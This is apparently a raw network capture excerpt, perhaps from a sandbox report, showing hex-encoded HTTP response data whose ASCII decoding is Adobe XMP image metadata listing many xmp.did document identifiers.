30 31 38 30 31 31 37 34 30 37 32 30 36 38 31 31 42 38 44 45 43 31 35 33 32 45 34 30 45 30 41 42
                                                                                                                                                                                    Data Ascii: 7206811B3F9EEBB5E0C305B</rdf:li> <rdf:li>xmp.did:0180117407206811B4F290DD2D38C32E</rdf:li> <rdf:li>xmp.did:0180117407206811B699AE0D8E085146</rdf:li> <rdf:li>xmp.did:0180117407206811B699EB5E5D7B9979</rdf:li> <rdf:li>xmp.did:0180117407206811B8DEC1532E40E0AB
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1310INData Raw: 35 44 46 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 35 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 35 42 42 38 45 32 44 39 39 41 36 37 36 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 35 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 35 46 45 43 31 35 30 35 35 44 46 37 35 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 35 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 37 41 35 43 43 33 30 34 43 44 32 35 39 31 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 35 38 30 31 31 37 34 30 37 32 30 36 38 31 31 39 37 41 35 46 31 41 41 45 43 32 37 35 37 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: 5DF87</rdf:li> <rdf:li>xmp.did:058011740720681195BB8E2D99A676D6</rdf:li> <rdf:li>xmp.did:058011740720681195FEC15055DF759A</rdf:li> <rdf:li>xmp.did:058011740720681197A5CC304CD25913</rdf:li> <rdf:li>xmp.did:058011740720681197A5F1AAEC2757D7</rdf:li> <rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1326INData Raw: 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 42 35 33 43 42 37 36 36 46 33 39 45 30 31 31 39 43 33 33 38 46 34 38 34 34 42 43 34 45 37 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 42 36 34 44 32 41 36 33 33 32 31 36 38 31 31 39 37 41 35 46 35 36 32 31 32 39 45 41 38 31 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 42 37 44 43 30 35 35 46 38 30 32 45 32 31 31 42 41 37 38 41 35 33 42 35 43 43 30 42 46 31 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 42 38 36 44 41 33 36 33 36 34 41 45 34 31 31 42 38 37 33 42 33 44 35 45 34 36 43 38 45 39 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64
                                                                                                                                                                                    Data Ascii: rdf:li> <rdf:li>xmp.did:0B53CB766F39E0119C338F4844BC4E7C</rdf:li> <rdf:li>xmp.did:0B64D2A63321681197A5F562129EA81F</rdf:li> <rdf:li>xmp.did:0B7DC055F802E211BA78A53B5CC0BF1E</rdf:li> <rdf:li>xmp.did:0B86DA36364AE411B873B3D5E46C8E9F</rdf:li> <rdf:li>xmp.did
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1334INData Raw: 69 3e 78 6d 70 2e 64 69 64 3a 31 32 39 31 64 66 65 61 2d 63 66 39 64 2d 34 38 30 32 2d 39 63 33 38 2d 32 35 34 34 35 61 63 62 30 61 63 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 32 41 43 32 35 46 30 41 43 43 30 44 46 31 31 41 32 43 43 39 46 36 37 46 30 38 39 45 39 34 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 32 41 43 37 35 43 41 33 42 32 30 36 38 31 31 38 37 31 46 44 41 31 36 41 45 31 42 44 33 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 32 42 44 31 39 43 36 39 36 38 45 44 46 31 31 38 31 42 31 39 38 44 32 30 31 41 37 38 42 32 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 31 32 43 33 42 36 43 31 46
                                                                                                                                                                                    Data Ascii: i>xmp.did:1291dfea-cf9d-4802-9c38-25445acb0ac9</rdf:li> <rdf:li>xmp.did:12AC25F0ACC0DF11A2CC9F67F089E943</rdf:li> <rdf:li>xmp.did:12AC75CA3B206811871FDA16AE1BD36B</rdf:li> <rdf:li>xmp.did:12BD19C6968EDF1181B198D201A78B2A</rdf:li> <rdf:li>xmp.did:12C3B6C1F
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1366INData Raw: 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 31 38 37 43 39 46 45 32 46 32 30 36 38 31 31 39 41 38 32 46 45 32 41 43 42 43 35 37 34 33 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 31 38 39 33 44 32 31 34 30 37 42 45 30 31 31 42 38 44 30 45 43 30 41 37 44 39 41 33 38 46 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 31 39 66 63 63 30 66 2d 36 63 62 66 2d 61 39 34 35 2d 62 39 63 31 2d 33 30 66 38 39 66 39 62 39 34 61 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 31 46 39 37 41 42 32 38 33 32 30 36 38 31 31 38 30 38 33 44 38 36 43 41 31 35 46 41 46 33 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32
                                                                                                                                                                                    Data Ascii: > <rdf:li>xmp.did:2187C9FE2F2068119A82FE2ACBC57436</rdf:li> <rdf:li>xmp.did:21893D21407BE011B8D0EC0A7D9A38F3</rdf:li> <rdf:li>xmp.did:219fcc0f-6cbf-a945-b9c1-30f89f9b94a4</rdf:li> <rdf:li>xmp.did:21F97AB2832068118083D86CA15FAF3B</rdf:li> <rdf:li>xmp.did:2
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1382INData Raw: 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 64 65 32 30 33 32 33 2d 61 30 35 66 2d 34 33 30 64 2d 62 61 65 65 2d 37 35 35 38 65 65 64 32 39 66 61 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 65 31 33 33 30 30 31 2d 33 64 65 36 2d 30 64 34 65 2d 39 65 62 33 2d 65 39 33 64 66 34 30 36 62 38 33 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 65 33 61 33 32 33 37 2d 61 33 30 61 2d 34 63 39 65 2d 62 34 31 32 2d 64 39 64 38 61 61 61 31 32 36 63 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 32 66 30 64 66 36 64 38 2d 33 64 63 34 2d 30 33 34 30 2d 62 39 37 39 2d 37 36 66 35 30 30 37 64 30 62 32 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64
                                                                                                                                                                                    Data Ascii: li> <rdf:li>xmp.did:2de20323-a05f-430d-baee-7558eed29faa</rdf:li> <rdf:li>xmp.did:2e133001-3de6-0d4e-9eb3-e93df406b833</rdf:li> <rdf:li>xmp.did:2e3a3237-a30a-4c9e-b412-d9d8aaa126c4</rdf:li> <rdf:li>xmp.did:2f0df6d8-3dc4-0340-b979-76f5007d0b23</rdf:li> <rd
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1390INData Raw: 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 35 45 32 45 34 31 36 35 41 41 36 44 46 31 31 41 44 41 36 42 33 37 39 37 45 33 33 39 38 44 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 35 45 39 39 43 35 43 30 41 32 30 36 38 31 31 41 39 36 34 46 36 37 32 31 34 37 33 31 41 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 35 46 39 42 38 46 35 33 37 32 36 36 38 31 31 38 32 32 41 46 44 38 45 36 43 42 44 39 38 43 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 33 35 64 66 30 39 62 62 2d 34 64 37 37 2d 34 32 37 30 2d 39 37 35 64 2d 63 39 38 39 37 32 64 36 66 31 38 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64
                                                                                                                                                                                    Data Ascii: li> <rdf:li>xmp.did:35E2E4165AA6DF11ADA6B3797E3398DD</rdf:li> <rdf:li>xmp.did:35E99C5C0A206811A964F67214731AFC</rdf:li> <rdf:li>xmp.did:35F9B8F537266811822AFD8E6CBD98C8</rdf:li> <rdf:li>xmp.did:35df09bb-4d77-4270-975d-c98972d6f180</rdf:li> <rdf:li>xmp.did
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1406INData Raw: 31 41 34 43 39 46 42 36 30 30 37 31 42 45 45 33 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 33 35 46 44 42 33 35 32 43 32 30 36 38 31 31 38 43 31 34 42 46 45 35 30 46 36 31 45 32 42 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 33 36 34 36 37 62 62 2d 34 64 63 35 2d 34 63 36 66 2d 38 35 64 63 2d 37 38 66 36 62 66 35 32 34 36 34 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 33 36 36 63 62 62 31 2d 32 61 35 64 2d 34 36 38 36 2d 61 61 35 34 2d 35 37 32 30 33 37 62 32 39 61 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 34 33 38 32 41 38 43 44 31 36 32 30 36 38 31 31 42 34 42 43 43 32 41 38 45 42 43 37 38 31
                                                                                                                                                                                    Data Ascii: 1A4C9FB60071BEE36</rdf:li> <rdf:li>xmp.did:435FDB352C2068118C14BFE50F61E2B4</rdf:li> <rdf:li>xmp.did:436467bb-4dc5-4c6f-85dc-78f6bf524646</rdf:li> <rdf:li>xmp.did:4366cbb1-2a5d-4686-aa54-572037b29a42</rdf:li> <rdf:li>xmp.did:4382A8CD16206811B4BCC2A8EBC781
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1422INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 31 45 36 41 36 38 41 32 31 32 30 36 38 31 31 42 35 30 33 38 37 35 44 43 45 42 37 38 32 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 31 46 34 31 34 34 30 31 30 32 30 36 38 31 31 41 46 46 44 38 36 43 31 32 37 44 41 30 35 31 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 31 46 37 38 45 37 39 42 37 45 38 45 33 31 31 41 41 37 31 39 42 41 43 46 42 43 33 37 42 44 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 31 61 62 30 35 62 30 2d 39 64 62 35 2d 37 32 34 35 2d 38 34 30 38 2d 36 30 61 62 37 65 38 37 39 63 66 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>xmp.did:51E6A68A21206811B503875DCEB7820C</rdf:li> <rdf:li>xmp.did:51F4144010206811AFFD86C127DA0516</rdf:li> <rdf:li>xmp.did:51F78E79B7E8E311AA719BACFBC37BD9</rdf:li> <rdf:li>xmp.did:51ab05b0-9db5-7245-8408-60ab7e879cf2</rdf:li> <rdf:li>xmp.
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1429INData Raw: 3e 78 6d 70 2e 64 69 64 3a 35 39 30 35 46 46 36 34 44 31 31 42 45 31 31 31 42 35 46 45 38 31 33 43 32 30 35 45 41 44 36 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 39 31 32 62 34 35 38 2d 32 36 66 33 2d 34 33 65 33 2d 61 63 64 38 2d 34 66 31 62 61 30 35 35 31 65 35 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 39 32 62 36 35 38 37 2d 63 33 62 33 2d 34 34 38 65 2d 61 66 33 39 2d 65 64 34 62 64 37 38 39 65 66 32 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 39 35 32 45 34 39 45 36 38 46 44 44 46 31 31 38 45 45 43 38 45 34 43 37 42 46 38 35 43 34 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 35 39 35 32 61 32
                                                                                                                                                                                    Data Ascii: >xmp.did:5905FF64D11BE111B5FE813C205EAD63</rdf:li> <rdf:li>xmp.did:5912b458-26f3-43e3-acd8-4f1ba0551e53</rdf:li> <rdf:li>xmp.did:592b6587-c3b3-448e-af39-ed4bd789ef21</rdf:li> <rdf:li>xmp.did:5952E49E68FDDF118EEC8E4C7BF85C44</rdf:li> <rdf:li>xmp.did:5952a2
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1445INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 37 36 42 38 32 30 45 33 34 32 33 36 38 31 31 38 32 32 41 44 30 37 43 37 43 43 34 33 38 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 37 37 38 30 66 31 66 2d 39 32 30 63 2d 34 39 34 35 2d 39 37 62 35 2d 62 65 36 36 32 34 62 62 66 61 32 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 37 38 35 39 36 37 31 30 41 32 30 36 38 31 31 39 31 30 39 42 45 41 37 31 35 32 42 31 33 32 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 36 37 38 36 31 36 64 32 2d 64 32 33 34 2d 34 35 31 33 2d 38 62 36 32 2d 38 36 32 34 39 39 39 39 30 37 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>xmp.did:676B820E34236811822AD07C7CC438D7</rdf:li> <rdf:li>xmp.did:67780f1f-920c-4945-97b5-be6624bbfa20</rdf:li> <rdf:li>xmp.did:678596710A2068119109BEA7152B1323</rdf:li> <rdf:li>xmp.did:678616d2-d234-4513-8b62-862499990715</rdf:li> <rdf:li>xm
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1461INData Raw: 36 41 43 33 37 32 38 32 30 36 38 31 31 42 37 43 34 38 31 31 33 37 36 41 43 45 42 30 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 35 38 39 61 36 35 61 2d 30 31 31 38 2d 66 65 34 38 2d 39 30 62 65 2d 30 36 33 63 63 65 32 36 61 63 36 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 35 43 31 38 46 36 44 44 36 37 44 31 31 45 30 42 30 43 34 45 32 44 30 42 35 43 33 30 41 44 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 35 43 31 38 46 37 31 44 36 37 44 31 31 45 30 42 30 43 34 45 32 44 30 42 35 43 33 30 41 44 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 35 43 42 33 33 30 30 45 33 32 30 36 38 31 31 38 34 44 35 44 39
                                                                                                                                                                                    Data Ascii: 6AC3728206811B7C4811376ACEB01</rdf:li> <rdf:li>xmp.did:7589a65a-0118-fe48-90be-063cce26ac61</rdf:li> <rdf:li>xmp.did:75C18F6DD67D11E0B0C4E2D0B5C30AD4</rdf:li> <rdf:li>xmp.did:75C18F71D67D11E0B0C4E2D0B5C30AD4</rdf:li> <rdf:li>xmp.did:75CB3300E320681184D5D9
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1469INData Raw: 78 6d 70 2e 64 69 64 3a 37 44 39 45 38 45 38 43 33 34 43 35 31 31 45 37 41 37 36 30 38 44 38 34 46 45 42 35 37 34 37 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 41 39 42 39 44 43 33 42 41 36 31 31 45 30 38 38 43 36 41 37 36 44 39 41 42 35 32 39 39 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 45 34 43 44 36 36 41 30 32 31 36 38 31 31 39 35 46 45 38 30 31 34 45 39 32 39 45 34 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 44 46 34 41 42 41 38 38 30 32 30 36 38 31 31 38 30 38 33 43 37 45 39 41 42 30 44 33 33 32 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 37 45 33 37 38 45 35 31 34 30 32 30 36 38 31
                                                                                                                                                                                    Data Ascii: xmp.did:7D9E8E8C34C511E7A7608D84FEB57472</rdf:li> <rdf:li>xmp.did:7DA9B9DC3BA611E088C6A76D9AB5299C</rdf:li> <rdf:li>xmp.did:7DE4CD66A021681195FE8014E929E489</rdf:li> <rdf:li>xmp.did:7DF4ABA8802068118083C7E9AB0D332A</rdf:li> <rdf:li>xmp.did:7E378E514020681
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1493INData Raw: 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 42 30 34 44 36 42 39 41 32 32 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 44 43 43 30 30 35 31 33 32 30 36 38 31 31 39 39 34 43 45 38 35 41 34 35 32 46 30 34 36 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 45 34 35 38 33 42 41 42 32 30 36 38 31 31 38 32 32 41 44 36 38 43 30 34 37 39 37 31 41 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 38 41 45 46 32 41 36 33 30 38 32 30 36 38 31 31 38 32 32 41 38 34 31 33 37 30 36 44 36 39 39 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70
                                                                                                                                                                                    Data Ascii: FC</rdf:li> <rdf:li>xmp.did:8AB04D6B9A226811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:8ADCC00513206811994CE85A452F046A</rdf:li> <rdf:li>xmp.did:8AE4583BAB206811822AD68C047971A8</rdf:li> <rdf:li>xmp.did:8AEF2A6308206811822A8413706D6998</rdf:li> <rdf:li>xmp
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1525INData Raw: 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 37 35 41 36 38 42 45 30 37 32 30 36 38 31 31 39 32 42 30 45 39 30 44 30 34 38 45 41 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 37 36 32 62 64 30 32 2d 30 61 39 30 2d 64 37 34 64 2d 61 30 32 37 2d 63 34 66 61 30 32 31 62 32 37 62 63 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 37 37 37 45 45 42 34 31 42 32 30 36 38 31 31 38 30 38 33 46 38 30 45 33 30 41 43 44 33 36 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 37 45 46 31 44 33 41 37 32 45 32 44 46 31 31 42 42 42 38 39 44 38 45 36 43 43 46 36 39 30 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 37 61
                                                                                                                                                                                    Data Ascii: <rdf:li>xmp.did:975A68BE0720681192B0E90D048EA72C</rdf:li> <rdf:li>xmp.did:9762bd02-0a90-d74d-a027-c4fa021b27bc</rdf:li> <rdf:li>xmp.did:9777EEB41B2068118083F80E30ACD366</rdf:li> <rdf:li>xmp.did:97EF1D3A72E2DF11BBB89D8E6CCF6905</rdf:li> <rdf:li>xmp.did:97a
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1529INData Raw: 31 31 38 32 44 34 43 45 42 42 36 42 31 30 43 37 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 42 43 35 46 35 35 37 30 38 32 30 36 38 31 31 38 41 36 44 45 46 38 36 31 30 44 32 36 37 44 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 42 44 35 33 41 46 35 31 35 44 43 45 30 31 31 38 42 46 46 43 31 42 31 45 36 36 37 32 43 36 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 42 46 33 36 30 33 32 42 33 32 31 36 38 31 31 39 42 34 37 38 38 43 32 30 42 38 44 35 37 34 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 42 46 43 34 31 34 37 34 36 32 30 36 38 31 31 39 31 30 39 41 42 43 43 38 31 30 44 30 36 35 41 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: 1182D4CEBB6B10C7C6</rdf:li> <rdf:li>xmp.did:9BC5F557082068118A6DEF8610D267D9</rdf:li> <rdf:li>xmp.did:9BD53AF515DCE0118BFFC1B1E6672C6F</rdf:li> <rdf:li>xmp.did:9BF36032B32168119B4788C20B8D5749</rdf:li> <rdf:li>xmp.did:9BFC4147462068119109ABCC810D065A</rdf
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1545INData Raw: 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 46 31 33 37 34 30 46 36 42 36 41 45 30 31 31 41 35 46 33 39 35 30 46 45 37 46 46 36 35 38 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 46 31 44 42 30 35 35 32 45 43 37 45 31 31 31 41 45 33 39 39 45 41 42 44 30 38 34 32 45 34 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 46 33 43 46 41 32 31 38 38 30 42 45 37 31 31 42 46 30 36 39 34 30 36 36 37 37 45 38 42 30 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 46 36 43 31 34 46 32 31 39 32 30 36 38 31 31 38 43 31 34 44 45 45 36 41 45 36 36 45 35 44 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 46 38
                                                                                                                                                                                    Data Ascii: li> <rdf:li>xmp.did:AF13740F6B6AE011A5F3950FE7FF6584</rdf:li> <rdf:li>xmp.did:AF1DB0552EC7E111AE399EABD0842E47</rdf:li> <rdf:li>xmp.did:AF3CFA21880BE711BF069406677E8B06</rdf:li> <rdf:li>xmp.did:AF6C14F2192068118C14DEE6AE66E5DB</rdf:li> <rdf:li>xmp.did:AF8
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1561INData Raw: 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 36 45 30 33 44 39 45 37 32 46 32 44 46 31 31 39 33 33 32 39 31 32 37 43 32 46 43 32 44 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 37 30 38 45 38 38 33 43 37 32 30 36 38 31 31 39 31 30 39 45 36 32 30 37 31 44 41 45 46 45 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 37 32 33 36 44 36 46 34 36 32 30 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 37 33 30 44 44 32 39 39 42 32 30 36 38 31 31 38 32 32 41 38 34 31 33 37 30 36 44 36 39 39 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 37 36 36 41 39 39 41 41 32
                                                                                                                                                                                    Data Ascii: f:li>xmp.did:C6E03D9E72F2DF1193329127C2FC2DD6</rdf:li> <rdf:li>xmp.did:C708E883C72068119109E62071DAEFEC</rdf:li> <rdf:li>xmp.did:C7236D6F46206811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:C730DD299B206811822A8413706D6998</rdf:li> <rdf:li>xmp.did:C766A99AA2
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1585INData Raw: 31 39 39 46 44 33 37 32 33 32 30 36 38 31 31 39 35 38 32 42 30 43 46 43 31 41 37 36 31 30 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 31 41 33 35 31 42 43 33 33 32 30 36 38 31 31 39 31 30 39 38 32 36 31 33 44 30 44 38 34 33 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 31 42 33 44 37 30 32 30 46 32 33 36 38 31 31 42 44 33 35 39 32 31 36 34 43 37 30 37 30 31 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 31 42 39 34 36 31 39 37 43 42 41 31 31 45 31 38 41 33 36 43 44 35 45 37 34 31 39 39 30 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 31 43 36 38 33 32 32 39 45 32 30 36 38 31 31 39 39 34 43 45 41 30 36
                                                                                                                                                                                    Data Ascii: 199FD37232068119582B0CFC1A76106</rdf:li> <rdf:li>xmp.did:D1A351BC33206811910982613D0D8437</rdf:li> <rdf:li>xmp.did:D1B3D7020F236811BD3592164C70701D</rdf:li> <rdf:li>xmp.did:D1B946197CBA11E18A36CD5E7419900E</rdf:li> <rdf:li>xmp.did:D1C683229E206811994CEA06
